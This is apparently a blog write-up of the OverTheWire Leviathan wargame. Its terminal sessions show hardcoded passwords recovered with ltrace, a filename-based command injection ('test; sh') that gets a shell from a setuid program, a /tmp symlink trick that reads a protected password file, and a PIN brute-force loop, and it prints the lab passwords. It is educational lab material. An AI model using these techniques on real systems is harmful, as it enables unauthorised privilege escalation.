It’s been a while since I’ve had a decent post. Life happened and I’ve started the transition into a new job with an awesome company. I wanted to post something though, even if it’s going to be a short one.

I’m going to start with some write up’s of the OverTheWire wargames starting with Leviathan. If you haven’t done any of these yet, I suggest you do. I also suggest, that if you are new to the whole linux things, you start with Bandit as it is a great primer.

So. Let’s do this!

Leviathan 0 -> 1

So, first thing we see is a .backup directory containing a bookmarks.html file.

[email protected]:~$ ls -al
total 24
drwxr-xr-x   3 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4096 Aug  8 23:10 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
[email protected]:~$ ls -al
total 24
drwxr-xr-x   3 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4096 Aug  8 23:10 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
[email protected]:~$ cd .backup/
[email protected]:~/.backup$ ls -al
total 140
drwxr-x--- 2 leviathan1 leviathan0   4096 Aug  8 23:10 .
drwxr-xr-x 3 root       root         4096 Nov 14  2014 ..
-rw-r----- 1 leviathan1 leviathan0 133259 Nov 14  2014 bookmarks.html

Checking the file for any passwords gives us the Leviathan1 password.

[email protected]:~/.backup$ cat bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for 
leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to 
leviathan1</A>

Leviathan 1 -> 2

This one is slightly more complicated. We have a check ELF that asks us for a password and then exits. Luckily ltrace is installed, we can easily see that it’s looking for sex as the password.

[email protected]:~$ ls -al
total 28
drwxr-xr-x   2 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7493 Nov 14  2014 check
[email protected]:~$ ./check
password: pas
Wrong password, Good Bye ...
[email protected]:~$ ltrace ./check
__libc_start_main(0x804852d, 1, 0xffffd7b4, 0x80485f0 <unfinished ...>
printf("password: ")                                                         = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password: pas
)                                 = 112
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 97
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 115
strcmp("pas", "sex")                                                         = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                         = 29
+++ exited (status 0) +++
[email protected]:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Leviathan 2 -> 3

I have a love/hate relationship with this one. It’s another ELF that prints the contents of whatever file you feed it assuming the current user has permissions. Problem is…I don’t have permissions to the file I want to print.

[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Using ltrace again, we can see it’s using access() to check if we have permissions and then calling cat on the file.

[email protected]:/tmp/tmp.xBI5xmyitP$ ltrace ~/printfile test
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("test", 4)                                                            = 0
snprintf("/bin/cat test", 511, "/bin/cat %s", "test")                        = 13
system("/bin/cat test" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                       = 0
+++ exited (status 0) +++

I tried a few things using file names and confirmed the EUID is leviathan3. Another quick change to the file name and BAM! we got our password

[email protected]:/tmp/tmp.xBI5xmyitP$ touch test\;\ id
[email protected]:/tmp/tmp.xBI5xmyitP$ touch test\;\ bash
[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ id
/bin/cat: test: Permission denied
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile test;\;\ bash
/bin/cat: test: Permission denied
-bash: ; bash: command not found
[email protected]:/tmp/tmp.xBI5xmyitP$ bash
[email protected]:/tmp/tmp.xBI5xmyitP$ exit
exit
[email protected]:/tmp/tmp.xBI5xmyitP$ touch test\;\ sh
[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ sh
/bin/cat: test: Permission denied
$ id
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
$ cat /etc/leviathan_pass/leviathan3
Ahdiemoo1j

Leviathan 3 -> 4

This one is the same as level 2, just using ltrace to see the password.

[email protected]:~$ ./level3
Enter the password> pas
bzzzzzzzzap. WRONG
[email protected]:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7b4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                   = -1
printf("Enter the password> ")                                               = 20
fgets(Enter the password> pass
"pass\n", 256, 0xf7fcac20)                                             = 0xffffd5ac
strcmp("pass\n", "snlprintf\n")                                              = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                                                   = 19
+++ exited (status 0) +++
[email protected]:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m

Leviathan 4 -> 5

Again, another easy one. A ELF hidden in a .trash directory that spat out some binary. Using Perl, I translated it back to ASCII and got our password for leviathan 5.

[email protected]:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
[email protected]:~/.trash$ ./bin | perl -lape '$_=pack("(B8)*",@F'
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
[email protected]:~/.trash$ ./bin | perl -lape '$_=pack"(B8)*",@F'
Tith4cokei

Leviathan 5 -> 6

Tricky, but not to difficult. The ELF simply prints out the contents of file.log so I just created a symbolic link between file.log and our password file.

[email protected]:~$ ./leviathan5
Cannot find /tmp/file.log
[email protected]:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                                            = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
[email protected]:~$ touch /tmp/file.log
[email protected]:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0x804b008
fgetc(0x804b008)                                                             = '\377'
feof(0x804b008)                                                              = 1
fclose(0x804b008)                                                            = 0
getuid()                                                                     = 12005
setuid(12005)                                                                = 0
unlink("/tmp/file.log")                                                      = 0
+++ exited (status 0) +++
[email protected]:~$ echo test > /tmp/file.log
[email protected]:~$ ./leviathan5
test
[email protected]:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log; ./leviathan5
UgaoFee4li

Leviathan 6 -> 7

So we have an ELF that asks for a 4 digit pin, ltrace didn’t help us.

[email protected]:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
[email protected]:~$ ./leviathan6 5555
Wrong
[email protected]:~$ ltrace ./leviathan6 6666
__libc_start_main(0x804850d, 2, 0xffffd7a4, 0x8048590 <unfinished ...>
atoi(0xffffd8d0, 0xffffd7a4, 0xffffd7b0, 0xf7e5619d)                         = 6666
puts("Wrong"Wrong
)                                                                = 6
+++ exited (status 6) +++

It’s only a 4 digit pin, so a little bash magic and we can brute force it.

for i in {0..9}{0..9}{0..9}{0..9}; do ./leviathan6 $i; done
...
Wrong
$ id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Leviathan 7 -> 8

[email protected]:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.